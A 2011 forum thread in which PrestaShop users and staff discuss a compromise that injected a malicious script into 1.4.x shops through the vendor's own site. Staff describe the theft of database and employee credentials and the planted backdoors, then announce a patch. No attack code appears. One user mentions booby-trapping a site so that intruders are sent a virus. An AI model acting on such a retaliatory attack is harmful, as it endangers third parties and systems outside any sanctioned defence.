199 replies to this topic

[dazzza]

I've left the files in place on a project i'm working on for a client. Now if the hacker knows the admin address of the site & the login details & tries to access it, when they hit "log in" instead of logging in, it sends them a virus

[tobes]

chemapresta, on 24 August 2011 - 06:24 PM, said:

dazzza, on 24 August 2011 - 04:53 PM, said:

It seems to have only affected 1.4.3 & 1.4.4 so it must of been something that was added in 1.4.3
"Add my IP"
or
Layered module

No, I'm using PS v1.4.1.0 and I am also affected.

1.4.2.5 for me on both my sites. I too am waiting to hear back from the support email address.

[Adalid_Negro]

dazzza, on 24 August 2011 - 06:41 PM, said:

I've left the files in place on a project i'm working on for a client. Now if the hacker knows the admin address of the site & the login details & tries to access it, when they hit "log in" instead of logging in, it sends them a virus

}
Just change the name of the administrator folder...


www.promutual-eat.com/s/

[dazzza]

My PrestaShop 1.5 test site seems to be unaffected so far. Checked footer.tpl, smarty files, modules, database & apache logs. Nothing.

[indus]

..........

[Mike Kranzler]

Hello everybody,
First of all, thank you for your information and knowledge as we worked on closing this hole.

We have officially secured this footer.tpl vulnerability and created a guide for quickly and easily fixing it in your shop.

You can find that guide here: http://www.prestasho...rity-procedure/

Again, thank you so much for your patience as we researched and applied this fix. The information you posted and emailed to us was invaluable when it came to speeding up the process.

If you have any additional questions, please do not hesitate to email us, but please be sure to try our suggestions here first.

Thanks again, and happy selling!

-Mike

[thehandlestudio]

Thank you Mike.

Regards,

Mark.

[plextor-online]

thx Prestashop team

for your hard work to fix this problemm...

[geckoWebdesign]

Thank you ! Merci !

[fireman28]

Thanks!! My Avast Antivirus has been giving warnings for a couple of weeks, and it is now that I realise what was going on. Won't ignore it again!!

I thought I had messed my Theme yesterday when all carousels and a slider went mad.

I wonder why a news service was capable of giving access to download files and who knows what else...perhaps we should be allowed to opt-out in the future? Apart of money, we are loosing credibility with our customers.

Anybody knows what was the intention of such hack? What did the injected code do?

I thank again for everybody's efforts to bring this into control

Al

[PurpleEdge]

phrasespot, on 24 August 2011 - 03:15 PM, said:

Quote

if prestashop.com is infected maybe the problem come's from the back office wich contact some prestashop's urls.

This is actually not a bad assessment as to what may have been wrong, seeing the prevalence of the localhost infections.

Even if it was not, there is at least half a dozen places in the code where the content from prestashop.com is pulled and every single installation is out there is at the mercy of how security of the prestashop.com and its subdomains.

I understand the wish to collect stats/referrer points/affiliate credits etc but Prestashop should seriously reconsider including code that pulls stuff from other domains including their own. Any security conscience admin removes those sections from the code as soon as it is installed anyway. The alternative is that a situation like this one may arise anytime.

Just my two cents.

I agree 100% - this is a perfect example of the risk. Contacting head office for the latest news seems like a neat feature in a cms, but it is obviously a feature which requires constant vigilance.

Congratulations to PS for identifying the cause so quickly - now to prevent it happening again!

[PurpleEdge]

Julien Breux, on 24 August 2011 - 04:57 PM, said:

It's just a little tools to help you.

https://github.com/jbreux/psauditor/

Hi Julien,

Can you please post a little bit more information about what this is and how to use it?

[feltu]

Dear Prestashop Team,

thank you for fixing the problem
the hack had cost us alot of troubles on our 2 prestashop sites

I need to know some extra information.

-Is 1.4.4 ver. safe to upgrade?
-Will there be a new 1.4.x upgrade coming soon that covers this problem?
-Are we still safe to use the Upload function from the contact form after applying the herfix patch?
-Is there any chance that the password that we entered under the PayPal module has been sent to the hacker too?
-Are the email / personal info from the customer database being sent to the hacker?

we need to know answers to above urgently.

thank you
Cyril

[Takada]

Hello,

Something's missing, what is the risk for people who were infected on their local install? As there often is no password for mysql...

[goodboy88]

Me too get infected.

How can they upload or inject those code on my server since it is password protected? Anyone know?

[makaraci]

hi guys, i use 1.3.1 version of prestashop.I wonder if my site may be infected ?

[Carl Favre]

Hi makaraci,

It only concernes 1.4.x versions of PrestaShop.

[makaraci]

Carl Favre, on 25 August 2011 - 10:32 AM, said:

Hi makaraci,

It only concernes 1.4.x versions of PrestaShop.

Thanks Carl.I'm relaxed .

[Nebojsa Stojanovic]

Hi everybody,

First of all, I want to thank the PrestaTeam and the Community who were able to mobilize yesterday to correct the problem in just a few short hours.
I took the time to read each and every one of your posts, and I want to bring you as much information as possible to all your questions.

• As soon as we became aware of the fault, we began by searching for the origin. We contacted several storefront owners who had found the problem, they gave us access, and together we tried to reproduce it on multiple machines in-house. We identified several possibilities:
  
  • A security vulnerability in the Prestashop software that allowed the injection of malicious script on the shops.
    
  • A trojan that modifies the script before sending FTP.
    
  • A trojan recovering FTP access and allowing another script to change the solution.
    
  • A security vulnerability in the software on the servers.
  And we finally managed to find the answer: the issue was with our website, www.prestashop.com.
  So we started by correcting the problem on prestashop.com, blocking the attack, and then we split the team in three:
  
  • A team to more precisely analyze what the script was exactly to assess the damage;
    
  • A team to create the sets, and test it on several shops affected;
    
  • Another team was responsible for verifying the PrestaShop server in depth, to lock the server and trace it back to the origin of the hack to recover information as possible so that we can file an official report.
• Yes, www.PrestaShop.com has been compromised, allowing an attacker to exploit a script injection site and, as a result, another script on the remote stores.
  
• This "loophole" is because we do not verify information from our own site in terms of the software. This design flaw is fixed with the patch that we provided you yesterday. This patch fixes the problem and protects your store from future attacks.
  
• The software is completely secure as I am writing this, and the malicious script was offset yesterday afternoon around 7:00 a.m. Eastern Time.
  
• The consequences for the shops affected are:
  
  • The script get your access to the database and a table "Employees", and sent by mail to an anonymous address, which is why we have asked you to change the password for your database and the password for all your employees in the back office of your store.
    
  • The script added several points of entry ("backdoors") in the download and upload directories, to browse the directory of your store; these scripts are deleted by the patch.
    
  • The script removed the directory tools/smarty_v2; this directory is recreated by the patch.
    
  • The direct consequence is, for now, a temporary suspension of your site, until the application of security patches.
• What to do:
  
  • it is essential to quickly and apply the security patch if you have been affected because data is still vulnerable,
    
  • If you have not been affected , you should apply the security patch as a preventative measure.

The whole team PrestaShop is listening to you and we are at your disposal for any questions. We are actively working to respond to you individually today to help resolve any problems.
Yours.

[Mike Kranzler]

Thank you Nebosja, I know you and the rest of the team have worked very hard on this. I am going to close this thread, but for any additional questions or comments you may have, please visit the thread where we have published the fix, which you can find here.

-Mike